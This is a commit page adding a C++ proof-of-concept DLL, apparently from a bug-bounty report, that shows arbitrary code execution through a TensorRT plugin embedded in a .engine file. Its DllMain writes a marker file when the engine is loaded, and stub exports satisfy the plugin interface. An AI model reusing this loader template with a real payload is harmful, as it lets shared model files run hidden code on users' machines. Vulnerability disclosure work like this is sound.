Upload malicious_plugin.cpp with huggingface_hub
Browse files- malicious_plugin.cpp +62 -0
malicious_plugin.cpp
ADDED
|
@@ -0,0 +1,62 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
// Malicious TensorRT Plugin PoC - Proof of Concept for ACE via embedded plugin in .engine file
|
| 2 |
+
// This DLL exports the minimal required TensorRT plugin interface functions.
|
| 3 |
+
// When loaded by TensorRT during engine deserialization, DllMain executes arbitrary code.
|
| 4 |
+
|
| 5 |
+
#include <windows.h>
|
| 6 |
+
#include <cstdint>
|
| 7 |
+
#include <cstdio>
|
| 8 |
+
|
| 9 |
+
// Forward declarations - minimal TensorRT interfaces needed for plugin exports.
|
| 10 |
+
// We don't need full headers; just enough for the function signatures.
|
| 11 |
+
namespace nvinfer1 {
|
| 12 |
+
class ILoggerFinder;
|
| 13 |
+
class IPluginCreator;
|
| 14 |
+
}
|
| 15 |
+
|
| 16 |
+
// ============================================================================
|
| 17 |
+
// PROOF OF CONCEPT: DllMain executes when TensorRT loads the embedded DLL
|
| 18 |
+
// ============================================================================
|
| 19 |
+
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
|
| 20 |
+
{
|
| 21 |
+
if (ul_reason_for_call == DLL_PROCESS_ATTACH)
|
| 22 |
+
{
|
| 23 |
+
// PROOF OF CONCEPT: Write a file to prove arbitrary code execution
|
| 24 |
+
FILE* f = fopen("C:\\Users\\Trefor\\bug bounty\\TensorRT\\poc\\PWNED.txt", "w");
|
| 25 |
+
if (f)
|
| 26 |
+
{
|
| 27 |
+
fprintf(f, "ARBITRARY CODE EXECUTION ACHIEVED!\n");
|
| 28 |
+
fprintf(f, "This file was created by a malicious TensorRT plugin\n");
|
| 29 |
+
fprintf(f, "embedded in a .engine file during deserialization.\n");
|
| 30 |
+
fprintf(f, "No engine_host_code_allowed flag was set.\n");
|
| 31 |
+
fclose(f);
|
| 32 |
+
}
|
| 33 |
+
|
| 34 |
+
// Removed MessageBox to avoid blocking during testing
|
| 35 |
+
}
|
| 36 |
+
return TRUE;
|
| 37 |
+
}
|
| 38 |
+
|
| 39 |
+
// ============================================================================
|
| 40 |
+
// Required TensorRT plugin library exports
|
| 41 |
+
// ============================================================================
|
| 42 |
+
|
| 43 |
+
// setLoggerFinder - required by TensorRT plugin loading
|
| 44 |
+
extern "C" __declspec(dllexport) void setLoggerFinder(nvinfer1::ILoggerFinder* finder)
|
| 45 |
+
{
|
| 46 |
+
// No-op - just needs to exist
|
| 47 |
+
(void)finder;
|
| 48 |
+
}
|
| 49 |
+
|
| 50 |
+
// getCreators - required by TensorRT plugin loading (V3 API, checked first)
|
| 51 |
+
extern "C" __declspec(dllexport) nvinfer1::IPluginCreator* const* getCreators(int32_t& nbCreators)
|
| 52 |
+
{
|
| 53 |
+
nbCreators = 0;
|
| 54 |
+
return nullptr;
|
| 55 |
+
}
|
| 56 |
+
|
| 57 |
+
// getPluginCreators - fallback for older TensorRT versions (V2 API)
|
| 58 |
+
extern "C" __declspec(dllexport) nvinfer1::IPluginCreator* const* getPluginCreators(int32_t& nbCreators)
|
| 59 |
+
{
|
| 60 |
+
nbCreators = 0;
|
| 61 |
+
return nullptr;
|
| 62 |
+
}
|